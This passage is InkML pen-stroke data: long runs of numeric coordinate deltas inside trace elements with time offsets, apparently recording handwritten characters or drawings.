0,1 0,-1 0,1 0,0 0,0 0,0-1,0 0,0 1,0-1,4 1,6 3,0 0,1-1,-1-1,6 1,19 6,-26-7,-1-1,1-1,0 0,0 0,9-1,13 0,14-3,-45 2,0-1,1 1,-1 0,0-1,0 1,0-1,0 0,0 0,0 0,0-1,0 1,0-1,-1 1,1-1,-1 0,1 0,-1 0,1 0,-1-1,0 1,0 0,0-1,-1 0,1 1,0-1,-1 0,0 0,0 0,0 0,0 0,0 0,-1 0,1-3,3-25,-3 21,1-1,0 0,2-4,0-2,0 0,-1 0,-1 0,-1 0,0-1,-1 1,-1 0,-1-1,0 1,-2 0,-1-5,3 15,-1 0,0 1,0-1,0 1,-1 0,0 0,-1-1,-10-12,-8-7,0 0,-11-21,19 26,-7-8,20 27,1 0,-1 1,0-1,0 1,0-1,-1 1,1 0,0 0,0 0,-1 0,1 0,0 0,-1 1,1-1,-1 1,-1 0,-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4:38:07.2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61 62,'-837'0,"829"0,1 0,0 1,-1 0,1 0,-1 0,1 1,0 0,0 0,0 1,0 0,0 0,1 1,0 0,-4 3,-18 9,23-14,1 1,0-1,0 1,0 0,0 0,0 0,0 0,1 0,0 1,-2 1,0 4,0-1,0 1,1 0,0 1,0-1,1 1,1-1,-1 1,2 0,-1 1,-1 22,2-1,1 16,0-33,1-12,-1 1,0 0,1-1,0 1,0 0,0-1,0 1,0-1,1 1,0-1,0 0,0 1,0-1,0 0,6 6,-1-1,2 0,-1-1,1 0,10 10,2 1,1 0,0-2,1 0,1-1,0-2,9 3,-17-10,1 0,1-2,-1 0,7 1,22 4,81 28,-50-14,-16-8,52 6,-60-13,0 0,0-3,15-2,106-3,-68-2,-79 3,-12 0,1-1,-1-1,11-2,-22 3,0-1,0 0,0 0,0 0,0-1,-1 0,1 0,0 0,-1 0,1 0,-1-1,0 1,1-1,-1 0,1-1,4-5,0-1,-1 0,0 0,-1 0,0-1,2-6,-2 4,-1 0,-1 0,0-1,-1 1,1-11,3-66,-4-35,-3 115,0 0,-2 0,1 0,-1 0,-1 0,0 0,0 1,-1-1,0 1,0 0,-1 0,0 0,-1 1,0 0,-1 0,3 3,-1 1,0 0,0 0,0 1,0-1,-1 1,-1 0,-44-18,29 13,-42-16,0 3,-2 3,-11 0,41 11,-3-1,-1 2,1 2,-2 1,7 1,-26-6,19 3,19 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38:16.8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2 352,'7'-11,"1"0,-1 0,2 1,1-2,11-14,16-16,-22 26,12-17,-23 27,-1 0,1-1,-1 1,-1-1,1 0,-1 0,0-1,8-25,-5 20,-1 1,0-1,-1-1,0 1,-1 0,0-2,-3 37,-1-1,0 1,-2-1,0 0,-2 3,-13 38,-4 4,2-15,-2 0,-15 23,-11 9,-16 18,63-99,1 0,-1 0,1 0,0 1,0-1,0 1,0-1,0 2,1-4,0 0,0 0,0 1,0-1,0 0,0 0,0 0,0 0,0 1,0-1,0 0,0 0,0 0,0 0,0 0,0 1,0-1,1 0,-1 0,0 0,0 0,0 0,0 0,0 0,0 1,1-1,-1 0,0 0,0 0,0 0,0 0,1 0,-1 0,0 0,0 0,0 0,0 0,1 0,-1 0,0 0,0 0,0 0,0 0,1 0,-1 0,0 0,0 0,0 0,0-1,9-2,6-6,-1-1,0-1,-1 0,8-8,13-12,59-47,-91 76,0 0,0 1,0-1,0 1,1-1,-1 1,1 0,-2 0,0 1,-1 0,1 0,-1 0,1 0,0 0,-1 0,1 0,-1 0,1 0,0 0,-1 0,1 0,-1 0,1 0,0 0,-1 1,1-1,-1 0,1 0,-1 1,1-1,-1 0,1 1,-1-1,1 1,-1-1,0 0,1 1,-1-1,1 1,-1-1,0 1,1 0,0 2,0-1,1 1,-1 0,0 1,-1-1,1 0,-1 0,1 0,-1 0,0 1,0-1,0 3,-2 7,0 1,-3 7,-3 19,8-35,-1-1,1 1,0 0,-1-1,2 1,-1 0,0-1,1 1,0 0,1 1,3 4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1861.96">431 455,'0'2,"0"4,0 2,0 4,0 2,0-1,0 2,0 0,0 1,-3-1,-2 0,1 1,-1-4,0-1,1 0,1-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3762">441 280,'4'0,"1"2,-1 2,0 4,-2 2,2 0,-1 0,-1-3</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="10109.58">760 516,'0'-10,"0"5,0 1,0-1,0 0,-1 0,1 1,-1-1,-1-3,1 7,0-1,0 1,1 0,-1-1,0 1,0 0,0 0,0 0,0 0,-1-1,1 2,0-1,0 0,-1 0,1 0,-1 1,1-1,-1 0,1 1,-1-1,1 1,-1 0,1 0,-1-1,1 1,-1 0,-33-1,0 1,-14 2,45-2,1 1,-1-1,1 1,-1 0,1 0,-1 0,1 0,0 0,-1 1,1 0,0-1,0 1,0 1,1-1,-1 0,-1 1,2 0,-1 1,1-1,-1 1,1-1,0 1,0 0,1-1,-1 1,1 0,0 0,0 0,0 1,0 2,-1 12,1-1,1 1,1 0,2 10,-3-26,1 0,0 0,0 0,0 0,0 0,0 0,1 0,-1-1,1 1,-1-1,1 1,0-1,0 0,1 0,-1 1,0-1,1-1,-1 1,1 0,-1-1,1 1,0-1,0 0,0 0,3 1,0 0,1-1,0 1,-1-2,1 1,0-1,0 0,0 0,0 0,-1-1,1 0,1-1,-4 0,0 1,-1-1,1 0,0 0,-1 0,0 0,0 0,1-1,-1 0,-1 0,1 0,2-2,2-4,0-1,0-1,2-5,-6 11,0-1,-1 0,0 0,0-1,0 1,-1 0,0 0,0-4,0-3,-1-1,-1 0,0-5,1 18,0 0,0 1,0-1,-1 0,1 1,0-1,0 0,0 1,-1-1,1 0,0 1,-1-1,1 0,0 1,-1-1,1 1,-1-1,1 0,-1 1,1 0,-1-1,0 0,0 1,1 0,-1 0,0 0,1 0,-1 0,0 0,1 0,-1 0,0 0,1 0,-1 1,0-1,1 0,-1 0,0 1,1-1,-1 0,1 1,-1-1,1 1,-1-1,1 1,-1-1,0 1,-2 2,0 0,1 1,-1-1,0 1,1 0,0 0,0 0,0 1,-14 36,6-12,7-21,1 0,0 0,0 0,0 1,1-1,1 2,-1 52,2-42,-1 0,-3 20,1-25,1-6,0-1,-1 0,0 1,0-1,-2 4,-2 4,1 0,1 0,0 1,1-1,1 3,-7 31,8-45,0-1,-1 1,0-1,0 0,0 1,0-1,-1 0,1 0,-1-1,0 1,0-1,-1 1,1-1,-1 0,0 0,1-1,-2 1,2-1,-1 0,1 0,-1 0,1-1,-1 1,0-1,1 0,-1 0,0 0,0-1,0 0,0 1,0-1,0-1,0 1,1 0,-1-1,0 0,0 0,-2-1,4 1,0 0,1 0,-1 0,0 0,1 0,-1-1,1 1,-1-1,1 1,-1-1,1 1,0-1,0 0,0 0,0 1,0-1,0 0,1 0,-1 0,1 0,-1 0,1 0,0-2,-1-6,0 0,1 0,1 0,0-4,1-2,-2-34,0 24,2-11,-1 33,0 0,0 0,0 0,0 1,0-1,1 0,0 1,0-1,0 1,0 0,0 0,1-1,0 1,-1 1,1-1,0 0,0 1,0 0,1-1,-1 1,3-1,3-2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="16431.8">1035 147,'1'-6,"-1"-13,0 18,0 1,0-1,0 1,-1-1,1 0,0 1,0-1,0 1,0-1,-1 0,1 1,0-1,0 1,-1-1,1 1,-1-1,1 1,0-1,-1 1,1-1,-1 1,1 0,-1-1,1 1,-1 0,1 0,-1 0,1 0,-1 0,1 0,-1 1,1-1,0 0,-1 0,1 0,-1 0,1 0,-1 1,1-1,0 0,-1 0,1 1,-1-1,1 0,0 1,0-1,-1 1,-7 9,7-9,-5 8,1 0,0 0,1 0,0 1,0-1,1 1,0 0,0 2,0 0,-2 0,0 1,-1 0,-6 16,6-13,0 0,1 0,1 0,0 1,2-1,-2 14,3-18,-1-1,0 1,-1 0,0-1,-1 1,0-1,-1 2,1 1,0-1,1 1,0 4,2-12,0 0,-1 0,0 0,0 1,-6 20,8-27,0 0,0 0,0 0,0 0,0-1,0 1,0 0,0 0,1 0,-1 0,0 0,0 0,0 0,0 0,0 0,0 0,0 1,0-1,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,1 0,-1 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 1,0-1,0 0,0 0,0 0,0 0,0 0,0 0,-1 0,1 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,4-5,4-7,-3-2,1 2,1-1,0 1,1 0,0 0,8-8,1-1,-15 16,1 1,0 0,1 1,-1-1,1 0,0 1,-1 0,2 0,-1-1,-1 2,1 0,-1 0,0 0,1 0,0 0,-4 2,1 0,-1-1,0 1,1 0,-1 0,1 0,-1 0,1 0,-1 0,0 0,1 0,-1 0,1 0,-1 0,1 0,-1 0,1 0,-1 0,0 0,1 0,-1 0,1 1,-1-1,0 0,1 0,-1 1,1-1,-1 0,0 0,1 1,-1-1,0 0,0 1,1-1,-1 1,0-1,0 0,1 1,-1-1,0 1,0-1,0 0,0 1,4 13,1 1,-2 1,1 0,-2 0,1 14,-3-3,-1 0,-2 0,-2 12,4-3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38:06.7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5 6,'-30'31,"-16"24,42-51,1 1,0 0,0 0,0 1,1-1,0 1,0-1,0 1,1-1,-1 4,2-7,-1 0,1 0,0 0,0 1,0-1,0 0,0 0,0 0,1 1,-1-1,1 0,-1 0,1 0,0 0,0 0,0 0,0 0,0 0,1 0,-1 0,0-1,1 1,-1 0,1-1,0 1,0-1,-1 0,2 1,0 0,1 0,0 0,0 0,0-1,0 0,1 1,-1-1,0-1,1 1,-1 0,0-1,2 0,-3-1,0 1,0-1,1 1,-1-1,-1 0,1-1,0 1,0 0,0-1,-1 1,1-1,0 0,-1 0,0 0,1 0,-1-1,1-1,2-2,-1 0,0 0,0 0,0-1,-1 0,0 0,0-2,5-13,1-15,-6 27,10-57,-12 64,0 3,0 8,0 11,-2 118,1-134,0-1,1 1,-1-1,0 1,1 0,-1-1,1 1,0-1,0 0,0 1,0-1,0 0,1 1,-1-1,1 0,0 1,0-1,0-1,-1 1,1-1,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0-1,0 1,1-1,-1 0,0 1,0-1,0 0,1 0,1-1,-2 1,0 0,0-1,0 1,0-1,0 0,0 0,0 1,0-1,-1 0,1 0,0-1,0 1,-1 0,1-1,-1 1,1-1,-1 1,0-1,1 0,-1 0,4-6,-1 0,0 1,-1-1,1-5,1 0,10-21,-9 23,-1-1,0 0,-1 0,-1 0,0 0,2-13,-4 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38:02.3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89 3,'0'1,"0"-1,-1 0,1 0,-1 0,1 0,0 1,-1-1,1 0,-1 0,1 1,0-1,-1 0,1 1,0-1,0 0,-1 1,1-1,0 1,0-1,-1 0,1 1,0-1,0 1,0-1,0 0,0 1,0-1,-4 17,3-9,-4 5,0-1,-1 1,0-1,-2 3,-8 15,8-16,5-7,-1-1,1 1,0 0,0 1,1-1,0 0,0 3,2-9,0 0,0-1,0 1,0 0,0 0,0 0,0 0,1 0,-1 0,0 0,0 0,1 0,-1 0,1-1,-1 1,1 0,-1 0,1 0,0-1,-1 1,1 0,0-1,0 1,-1-1,1 1,0-1,0 1,0-1,0 1,-1-1,1 0,0 0,0 1,0-1,0 0,0 0,0 0,2 0,0 1,0-1,1 0,-1 0,0 0,0-1,0 1,0-1,0 0,0 0,0 0,1-1,0 0,1 0,-1-1,0 1,-1-1,1 0,0-1,-1 1,0 0,0-1,0 0,0 0,0 0,0-1,0-2,0 0,0 0,-1 0,0 0,0 0,-1-1,0 1,0-8,0 8,1-1,-1 0,1 0,1 1,-2 1,1 1,-1-1,1 1,-1-1,-1 0,1 0,-1-2,0 7,-1 0,1 1,0-1,0 0,0 0,-1 1,1-1,0 0,-1 0,1 1,-1-1,1 0,0 1,-1-1,0 0,1 1,-1-1,1 1,-1-1,0 1,1-1,-1 1,0 0,0-1,1 1,-1 0,0 0,0-1,1 1,-1 0,-1 0,-7-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37:58.3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460,'5'-1,"-1"1,0-1,0 0,0-1,0 1,0-1,0 1,0-1,-1-1,1 1,2-1,18-11,-1-1,-1-2,0 0,-1-1,0-1,-2-1,9-11,-26 27,1 1,-1-1,0 0,0 1,0-1,-1 0,1 0,-1 0,1-3,0-8,0 0,0-2,0-5,6-33,-3 28,-1 0,-2 0,-1-15,-1 41,-2 4,-40 89,-4-1,-11 10,29-51,4 0,-6 20,25-58,-10 25,-6 27,18-48,0 0,1 0,1 0,0 0,2 1,0-1,0 2,0-17,-1-1,0 1,0 0,0 0,1 0,-1 0,0 0,1-1,-1 1,1 0,-1 0,1-1,-1 1,1 0,-1-1,1 1,0 0,0-1,-1 1,2 0,0 0,0 0,0 0,0 0,1 0,-1 0,0-1,1 1,6 0,0 0,0 0,8 0,-12-1,30-2,-42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30:56.9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6 596,'1'-3,"-1"0,1 0,-1 0,1 0,0 0,0 0,1-1,1-5,12-34,-4 12,-2 0,3-18,-1 1,-7 29,0 0,0 0,-2-1,0 1,-4-21,1 28,1 0,0 0,0 0,1 1,1-4,1 11,-1 8,0 9,0 10,-1 1,-1-1,-2 12,0-25,0-1,-3 10,2-10,1 1,-2 8,0 18,-2-2,-9 28,12-50,-1 0,-1-1,0 0,0 0,-1 0,0-1,-1 0,0 0,-9 9,14-17,0 0,0-1,-1 1,1 0,0-1,-3 2,5-3,-1 0,1 0,-1 0,1 1,0-1,-1 0,1 0,-1 0,1 0,0 0,-1 0,1 0,-1 0,1 0,0 0,-1 0,1 0,-1 0,1 0,-1-1,1 1,0 0,-1-1,1 1,0-1,-1 1,1 0,0-1,0 1,0-1,0 1,-1-1,1 1,0-1,0 1,0-1,0 1,0-1,0 1,0-1,0 1,0 0,0-1,0 1,1-5,0 1,0 0,0 0,0 0,0 1,1-1,0 0,2-3,20-28,-15 23,91-115,-83 106,-12 15,0 0,1 0,-1 0,1 1,1-1,-6 6,-1-1,1 1,-1 0,0-1,1 1,-1 0,1 0,-1-1,1 1,-1 0,1 0,-1 0,1 0,-1 0,1 0,-1-1,1 1,-1 0,1 1,-1-1,1 0,-1 0,1 0,-1 0,1 0,-1 0,1 1,-1-1,1 0,0 1,0 0,0 0,-1 0,1 0,-1 0,1 0,-1 0,1 0,-1 0,1 0,-1 0,0 0,1 1,0 6,0-1,-1 1,0 0,0-1,0-5,0 12,-2 0,1 0,-2 0,0-1,-1 1,0-1,-1 0,0 0,-1-1,-1 1,5-10,0 2,-1 1,1-1,0 0,0 0,0 1,0 3,2-8,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,1 0,-1 0,0 0,1 0,-1 0,0 0,1 0,-1 0,1 0,0 0,-1-1,1 1,0 0,-1-1,1 1,0 0,0-1,0 1,-1-1,1 1,0-1,0 1,0-1,0 0,0 1,0-1,0 0,0 0,0 0,0 1,0-1,0 0,3 0,-1 0,1 0,0 0,0-1,-1 1,1-1,-1 1,1-1,-1-1,1 1,-1 0,1-1,0 0,4-3,0 0,0 0,-1-1,5-4,-2 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1267.94">458 350,'0'2,"0"2,0 2,0 4,0 2,-4-2,-1 2,-1 0,0 1,1 1,0-2,1-2,-3 2,0-1,1 2,0 1,1-1,2-2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2534.23">519 196,'0'4,"-2"1,-1 1,1 1,0 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="6697.74">743 308,'-10'0,"1"-1,-1 2,0-1,-7 3,13-3,1 1,0 0,-1 0,1 1,0-1,0 1,0-1,0 1,0 0,1 0,-1 0,-2 3,-11 12,7-7,0-1,-6 5,12-11,0 0,1 0,-1 0,1 1,0-1,0 1,0-1,0 1,0 2,-2 2,3-4,-1-1,1 1,-1 0,1 0,0 0,1 0,-1 0,1 0,0 0,0-3,0 0,0 0,0 1,0-1,0 0,0 0,1 0,-1 0,0 0,1 0,-1 0,1 0,-1 0,1 0,0 0,-1 0,1 0,0 0,0-1,0 1,0 0,-1 0,1-1,0 1,0-1,0 1,0-1,1 1,-1-1,0 1,0-1,0 0,0 0,3 1,0 0,1-1,-1 1,0-1,0 0,1-1,-1 1,0-1,0 0,0 0,0 0,0 0,0-1,0 1,0-1,0 0,0 0,-1-1,1 1,-1-1,2-1,1-2,0-1,-1 1,0-1,0 0,-1 0,0 0,0-1,0 0,-1 1,1-6,15-43,-17 55,-2 6,-1 7,-2-2,-1 0,1 0,-1 0,-1-1,0 1,0-1,-15 21,-4 3,-7 11,1 6,-1 8,9-16,15-30,0-1,-1 0,-1 0,-6 6,-42 38,18-18,28-25,2-3,0 0,0 0,-1-1,0 0,0-1,-1 0,-3 1,4-3,5-2,1-1,-1 0,0 0,1 0,-5 0,8-2,0 1,0-1,0 0,-1 0,1 0,0 0,0 0,0 0,0-1,-1 1,1 0,0-1,0 1,0 0,0-1,0 1,0-1,0 0,0 1,0-1,0 0,0 0,0 0,1 1,-1-1,0 0,-2-4,1 1,0 0,0 0,0-1,0 1,0-1,1 0,0 1,0-1,1 0,-1-2,0-13,1 0,0-4,1 4,-1 5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="11297.08">1021 1,'-1'8,"0"-1,-1 1,1-1,-2 1,1-1,-4 7,3-6,-9 21,-1 0,-2-1,-1-1,-1 0,-5 4,9-12,1 0,0 0,2 1,-8 19,12-25,-1 0,-1-1,-4 5,6-9,0 0,1 0,0 1,0-1,1 1,0 0,1 0,-1 6,1 2,2-9,0 1,-1 0,-3 7,1-6,-8 20,23-48,0 0,2 1,7-7,-15 16,1 0,-1 1,-1-2,1 1,0-3,11-16,-14 23,0 0,1 1,-1-1,1 1,-1 0,1 0,0 0,0 0,0 0,0 1,0-1,1 1,9-4,1 1,6-2,-3 2,-12 2,0 1,-1 0,1 0,-1 0,1 0,3 0,-7 1,0 0,0 0,0 0,0 1,0-1,0 0,0 0,0 0,0 1,-1-1,1 1,0-1,0 1,0-1,0 1,0-1,-1 1,1 0,0-1,-1 1,1 0,0 0,-1-1,1 1,-1 0,1 0,-1 0,0 0,1 0,0 4,1 0,-1 1,0-1,-1 1,1-1,-1 1,0-1,-1 0,1 1,-1-1,0 1,-1 3,0-1,-1 1,0 0,0-1,-1 0,-1 2,-1 1,1-1,1 1,0-1,0 1,-1 10,5-21,0 1,0-1,-1 1,1-1,0 1,0-1,0 1,0-1,0 1,0-1,0 1,0-1,0 1,0-1,0 1,0-1,0 1,1-1,-1 1,0-1,0 1,1-1,-1 1,0-1,0 1,1-1,-1 0,0 1,1-1,-1 0,1 1,-1-1,1 0,-1 1,0-1,1 0,-1 0,1 0,-1 1,1-1,-1 0,1 0,-1 0,1 0,-1 0,1 0,0 0,-1 0,1 0,-1 0,1 0,-1 0,1 0,-1-1,1 1,-1 0,5-2,0 1,0-1,0 0,-1 0,2-1,0 0,-1 0,1-1,-1 1,0-1,4-4,0-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30:52.1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32,'0'6,"-1"-1,0 1,0-1,-1 1,1-1,-1 0,0 0,-1 1,-6 18,3-7,-6 27,11-39,0 0,1 0,-1-1,1 1,0 0,1 0,0 4,-1-7,1 0,-1-1,1 1,0-1,0 1,0-1,-1 0,1 1,1-1,-1 0,0 0,0 0,0 1,1-1,-1-1,0 1,1 0,-1 0,1 0,-1-1,1 1,-1-1,1 1,0-1,-1 1,1-1,-1 0,1 0,0 0,2 0,1 1,-1-1,0-1,1 1,-1-1,0 1,1-1,-1 0,0-1,3 0,-2-1,0 1,-1-1,1-1,0 1,-1 0,0-1,0 0,0 0,0 0,-1-1,1 1,-1-1,1-3,0 2,-1-1,-1 0,1-1,-1 1,0 0,0-1,-1 1,0-1,-1-5,1 5,0 0,0 0,1 0,-1 0,2 0,0-2,-3 10,0-1,0 1,0 0,0 0,0-1,1 1,-1 0,0 0,0-1,0 1,0 0,0 0,0-1,1 1,-1 0,0 0,0 0,0-1,0 1,1 0,-1 0,0 0,0 0,1-1,-1 1,0 0,0 0,3 6,-2 14,-1-18,-1 36,0-24,1 0,1-1,0 1,1 5,-2-18,1 1,-1-1,1 1,0-1,-1 1,1-1,0 0,0 0,0 1,0-1,0 0,0 0,0 0,0 0,1 0,-1 0,0 0,1-1,-1 1,0 0,1-1,-1 1,1-1,-1 1,1-1,-1 0,2 1,6 0,0-1,0 0,0 0,5-1,-3 0,-6 2,0-2,0 1,0 0,-1-1,1 0,0 0,0-1,-1 1,1-1,-1 0,0 0,1 0,-1-1,0 1,0-1,0 0,1-2,2-3,0 1,-1-1,0 0,0 0,-1 0,0-1,2-6,5-14,6-23,-17 47,3-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30:49.0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5 74,'-3'0,"0"1,0-1,0 1,0 0,0-1,0 1,0 1,0-1,-1 1,-25 16,17-10,8-6,1 1,-1 0,0 0,1 0,0 0,0 1,0-1,0 1,0 0,1 0,0 0,0 0,0 0,0 1,0 1,0 2,0 0,0 0,1 1,1-1,-1 0,1 1,1-1,0 2,-1-9,0 0,0 1,1-1,-1 0,1 0,-1 1,1-1,0 0,-1 0,1 0,0 0,0 1,0-1,0-1,0 1,0 0,0 0,0 0,0 0,0-1,1 1,-1 0,0-1,0 1,1-1,-1 0,0 1,1-1,-1 0,1 0,7 1,0 0,0-1,-1 0,6-1,-3 1,3 0,-5 0,0-1,0 1,0-1,5-2,-11 2,0 0,0 0,0 0,0-1,0 1,0-1,0 0,0 1,-1-1,1-1,-1 1,0 0,1-1,0-1,17-25,0-2,5-13,-25 43,3-4,0-1,-1 0,1 0,-1 0,-1 0,1 0,-1 0,0 0,0-1,-1 1,0 0,0-1,-1-2,1 7,-1 0,1 0,-1 1,0-1,0 0,0 0,0 0,0 0,0 1,-1-1,1 1,0-1,-1 1,1-1,-1 1,0 0,1 0,-1 0,0 0,0 0,0 0,0 0,0 0,0 1,0-1,0 1,-9-3,1 1,-1 1,0-1,-4 2,14 0,-35-1,22 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30:45.5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463,'28'-45,"10"-21,-29 48,0 0,-2 0,-1-1,0 1,2-13,-6 10,0 0,-2 0,0 0,-2-7,1-23,1 30,1 10,-1 0,-1-1,1 1,-2 10,1 4,-2 6,-5 29,-4 5,4-13,0 1,2 5,-1 1,-2 2,-4 25,0 7,-18 49,26-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31:41.1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0,'0'0,"-2"0,-4 0,-3 0,1 0,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9:51:48.5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15,"0"20,7 45,-4-49,-2-18,1 0,0 0,1-1,8 26,-5-2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42:15.3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132'-1,"150"2,-101 16,-95-8,-56-5,-1 2,23 7,-30-8,-6-1,0-2,0 0,16 0,52-3,-31 0,1247 0,-669 2,-548 3,0 3,23 8,33 3,108 6,139 16,-95-8,274-7,1128-27,-1654 3,-17 0,0-1,0-1,1-1,-1-1,0-1,2-1,-1 1,1 2,15-1,74 4,-49 0,15 0,103-2,-128-4,22 0,410 3,-248 3,-131-4,788-14,1954 17,-2614 0,-224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39:48.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426'0,"-1374"2,32 6,-33-2,41-1,1669-7,-923 3,-641 6,42 13,95-3,1-18,-121 0,157 1,-337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29:17.7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6,'14'-6,"0"1,0 1,0 0,0 1,1 0,2 1,17-3,89-12,-57 9,11-5,112-23,-149 31,1 2,-1 1,29 4,-13-1,40-1,109 2,-117 2,27 7,-23 2,85 10,-106-17,38-3,1033-4,-651 1,-474 1,1 1,-1 0,10 4,-9-2,1-1,14 0,135-2,35 1,-16 14,-81-5,-91-9,-1 0,8 4,-9-3,1 0,11 0,84 1,7-5,-16 0,984 1,-106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28:56.4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86'0,"-484"5,-3 0,760-5,-830 1,1 2,8 2,0 0,1-1,258-1,-165-4,587 1,-637 4,0 3,11 6,61 5,24-9,17-8,-105-2,-70 2,-1 1,1 1,3 2,1-1,20 1,167-3,-110-3,1404 1,-1408-6,-51 3,-31 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18:31.2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1,'60'0,"87"0,2 7,-63-3,30-4,-30-1,1098 1,-1169 0,-1 2,0 0,1 1,1 1,-1-1,0 0,-1-1,15 1,29-3,-10-1,-1 3,2 2,15 1,12 2,-70-6,56 9,2-3,38-2,1685-7,-936 3,-666-9,-58 1,122 2,194-11,-265-4,-50 5,81 2,-34 5,-40 0,80 6,-145 6,0 2,3 4,12 4,134 20,-149-25,1 3,-36-4,-1 1,0 2,-1 1,13 6,-2 0,1-1,46 10,-51-20,0-2,39 1,83-6,-98 0,-59 0,245-9,128-32,-298 32,82-7,-90 11,6-4,44-5,-22 5,39-2,361 8,-297 4,1382-1,-1566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0:17:02.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06'0,"-795"0,0 2,0-1,0 1,7 3,-4-2,-1 0,11 1,6-2,36 4,1-4,4673-2,-472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31:07.0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 34,'-9'-7,"3"1,0 3,1 0,-1 1,0-1,0 1,-11-2,13 3,1 0,-1 1,0-1,1 1,-1 0,0 0,1 0,-1 1,1-1,-1 1,-5 1,8-1,-1 0,1 0,0 0,-1 0,1 0,0 1,-1-1,1 0,0 0,0 1,0-1,0 1,0-1,1 1,-1-1,0 1,1 0,-1-1,1 1,-1 0,1-1,0 1,0 0,0 0,0-1,0 1,0 3,1-1,0 1,0 0,0 0,0-1,1 1,-1-1,1 0,5 9,-2-8,-1 0,1 0,0-1,1 1,-1-1,1 0,0-1,6 4,-5-3,0 0,0 1,0-1,11 12,-16-14,0 0,-1 0,1 1,-1-1,0 0,1 0,-1 1,0-1,-1 0,1 1,0-1,-1 1,1 0,-1-1,0 1,0-1,0 1,0-1,0 1,-1 2,-2 9,-1 0,0 0,-12 25,15-36,-1 0,0 0,0 0,0 0,0-1,-1 1,1 0,-1-1,1 0,-1 1,0-1,0 0,0 0,-7 2,9-3,-1-1,0 1,0-1,1 1,-1-1,0 0,0 0,0 0,0 0,1 0,-1 0,0-1,0 1,0 0,1-1,-1 0,0 1,1-1,-1 0,0 0,1 0,-1 0,1 0,0 0,-1 0,1-1,0 1,-1 0,1-1,-1-2,-5-6,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30:44.6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 0,'13'17,"-11"-11,0-1,-1 1,1 0,-1 0,0 0,0 8,-2 38,0-25,1-13,-4 17,2-22,1 0,0 0,0 0,1 0,2 16,-1-21,-1 0,1 0,0-1,0 1,0 0,3 6,-3-9,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,1 0,-1-1,0 1,0 0,1-1,-1 1,1-1,-1 0,3 1,6 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2438.13">0 127,'2'0,"2"0,5 0,1 0,4 0,1 0,-3 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="15037.67">159 169,'8'0,"0"-1,-1 0,1 0,0-1,-1 0,1 0,-1-1,0 0,0 0,0-1,10-6,-14 8,-1 0,1-1,-1 1,0-1,0 1,0-1,0 1,0-1,-1 0,1 0,1-4,-3 5,1 1,-1 0,0-1,1 1,-1-1,0 1,0-1,0 1,0 0,0-1,0 1,0-1,-1 1,1 0,-1-1,1 1,-1-1,1 1,-1 0,1 0,-1-1,0 1,0 0,0 0,0 0,0 0,-1-2,-12-9,8 7,1 0,-1 1,-11-8,15 12,1-1,-1 0,0 0,1 1,-1-1,0 1,1-1,-1 1,0 0,0 0,0-1,1 1,-1 1,0-1,0 0,0 0,1 1,-1-1,0 1,-2 1,3-2,0 1,0-1,0 1,0-1,0 1,1 0,-1 0,0-1,0 1,1 0,-1 0,0 0,1 0,-1 0,1 0,-1 0,1 0,0 0,-1 0,1 0,0 0,0 0,0 0,0 0,0 0,0 1,0 4,1-1,0 0,0 1,3 5,0 4,8 62,-6-30,-5-43,0 0,1 0,-1 0,1 0,0 0,0-1,0 1,0 0,1-1,0 0,-1 0,1 1,1-2,-1 1,0 0,4 2,-5-4,0 0,0 0,0-1,-1 1,1 0,0-1,0 1,0-1,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0-1,-1 1,1-1,0 0,0 1,3-3,-1 1,0 0,0-1,0 0,0 0,0 0,0 0,-1-1,4-3,-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30:36.4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89 0,'0'0,"1"1,-1-1,1 0,-1 0,1 1,-1-1,0 0,1 0,-1 1,0-1,1 0,-1 1,0-1,1 1,-1-1,0 0,0 1,1-1,-1 1,0-1,0 1,0-1,0 0,0 1,1-1,-1 1,0 0,2 16,-2-15,1 7,-1 1,1 0,-2-1,1 1,-1-1,-1 0,0 1,0-1,-5 13,1-11,0 1,0-1,-12 15,6-9,7-10,1 1,-7 17,-1 3,7-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30:31.7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0"5,0 2,0 3,2-1,0-2,1-1,2 1,1 0,2 2,-2-1,3-2,-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30:27.7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7'0,"-9"-1,-1 1,1 0,-1 1,0 0,12 2,-17-2,-1-1,1 1,0 0,0 0,0 0,0 0,-1 0,1 1,-1-1,1 0,-1 1,1-1,-1 1,0-1,0 1,1 0,-1 0,0 0,-1-1,1 1,0 0,-1 0,1 0,0 3,1 6,8 51,-9-56,-1 0,0 0,0 0,-1 0,1 1,-1-1,-4 11,5-15,-1-1,0 1,0 0,0-1,-1 1,1-1,0 0,0 1,-1-1,1 0,-1 0,1 0,-1 0,0 0,1 0,-1 0,0 0,0-1,0 1,1-1,-4 1,-1 0,-1 0,0 0,0-1,-10-1,14 1,1 0,-1-1,1 1,-1-1,0 0,1 0,-3-1,-5-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18:30:20.9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4 0,'0'1,"1"-1,-1 0,1 0,-1 0,0 1,1-1,-1 0,1 1,-1-1,0 0,1 1,-1-1,0 0,0 1,1-1,-1 1,0-1,0 0,0 1,1-1,-1 1,0-1,0 1,0-1,0 1,0 0,2 15,-2-13,1 11,6 53,-5-53,0 1,-1 0,-1 0,0 0,-1 0,0-1,-2 1,0 0,0-1,-6 15,2-8,2-1,-7 43,2-24,7-28,0 0,-2 18,4 62,1-90,0 0,0 0,0 0,0 0,0 0,0 0,0 0,-1 0,1 0,0 0,-1 0,1 0,-1-1,1 1,-1 0,1 0,-1 0,1-1,-1 1,0 0,0 